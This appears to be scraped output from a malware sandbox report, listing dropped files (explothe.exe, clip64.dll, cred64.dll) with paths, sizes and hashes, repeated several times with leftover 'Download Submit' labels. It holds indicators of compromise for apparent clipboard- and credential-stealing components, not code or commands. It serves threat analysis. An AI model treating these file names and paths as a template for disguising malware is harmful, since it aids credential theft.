75aecbb851961553b07adb4d22f78485e000506e6f3be1695ba2d42cc264f6331a17926851dd404b92a6653f30abb75fdce1751a32cb2a3de3aeb7935be48a93

Download Submit
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

Filesize
221KB

MD5
7aac21870ff973c74a1a92726d843e40

SHA1
bc53dbd0f4f53d22fef19eb5bf3399f9c2f95995

SHA256
b82e90eca661a98171d813b7d7d78dc1cb89dcb332c7e87fd828af4d98276762

SHA512
75aecbb851961553b07adb4d22f78485e000506e6f3be1695ba2d42cc264f6331a17926851dd404b92a6653f30abb75fdce1751a32cb2a3de3aeb7935be48a93

Download Submit
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

Filesize
221KB

MD5
7aac21870ff973c74a1a92726d843e40

SHA1
bc53dbd0f4f53d22fef19eb5bf3399f9c2f95995

SHA256
b82e90eca661a98171d813b7d7d78dc1cb89dcb332c7e87fd828af4d98276762

SHA512
75aecbb851961553b07adb4d22f78485e000506e6f3be1695ba2d42cc264f6331a17926851dd404b92a6653f30abb75fdce1751a32cb2a3de3aeb7935be48a93

Download Submit
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

Filesize
221KB

MD5
7aac21870ff973c74a1a92726d843e40

SHA1
bc53dbd0f4f53d22fef19eb5bf3399f9c2f95995

SHA256
b82e90eca661a98171d813b7d7d78dc1cb89dcb332c7e87fd828af4d98276762

SHA512
75aecbb851961553b07adb4d22f78485e000506e6f3be1695ba2d42cc264f6331a17926851dd404b92a6653f30abb75fdce1751a32cb2a3de3aeb7935be48a93

Download Submit
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

Filesize
221KB

MD5
7aac21870ff973c74a1a92726d843e40

SHA1
bc53dbd0f4f53d22fef19eb5bf3399f9c2f95995

SHA256
b82e90eca661a98171d813b7d7d78dc1cb89dcb332c7e87fd828af4d98276762

SHA512
75aecbb851961553b07adb4d22f78485e000506e6f3be1695ba2d42cc264f6331a17926851dd404b92a6653f30abb75fdce1751a32cb2a3de3aeb7935be48a93

Download Submit
C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

Filesize
89KB

MD5
e913b0d252d36f7c9b71268df4f634fb

SHA1
5ac70d8793712bcd8ede477071146bbb42d3f018

SHA256
4cf5b584cf79ac523f645807a65bc153fbeaa564c0e1acb4dac9004fc9d038da

SHA512
3ea08f0897c1b7b5859961351eef59840bbf319a6ad7ebe1c9e1b5e2ce25588d7b1a37fd6c5417653521fc73f1f42eb043d0ee6fcd645aa92b8f305d726273b4

Download Submit
C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

Filesize
89KB

MD5
e913b0d252d36f7c9b71268df4f634fb

SHA1
5ac70d8793712bcd8ede477071146bbb42d3f018

SHA256
4cf5b584cf79ac523f645807a65bc153fbeaa564c0e1acb4dac9004fc9d038da

SHA512
3ea08f0897c1b7b5859961351eef59840bbf319a6ad7ebe1c9e1b5e2ce25588d7b1a37fd6c5417653521fc73f1f42eb043d0ee6fcd645aa92b8f305d726273b4

Download Submit
C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

Filesize
89KB

MD5
e913b0d252d36f7c9b71268df4f634fb

SHA1
5ac70d8793712bcd8ede477071146bbb42d3f018

SHA256
4cf5b584cf79ac523f645807a65bc153fbeaa564c0e1acb4dac9004fc9d038da

SHA512
3ea08f0897c1b7b5859961351eef59840bbf319a6ad7ebe1c9e1b5e2ce25588d7b1a37fd6c5417653521fc73f1f42eb043d0ee6fcd645aa92b8f305d726273b4

Download Submit
C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll

Filesize
273B

MD5
a5b509a3fb95cc3c8d89cd39fc2a30fb

SHA1
5aff4266a9c0f2af440f28aa865cebc5ddb9cd5c

SHA256
5f3c80056c7b1104c15d6fee49dac07e665c6ffd0795ad486803641ed619c529

SHA512
3cc58d989c461a04f29acbfe03ed05f970b3b3e97e6819962fc5c853f55bce7f7aba0544a712e3a45ee52ab31943c898f6b3684d755b590e3e961ae5ecd1edb9

Download Submit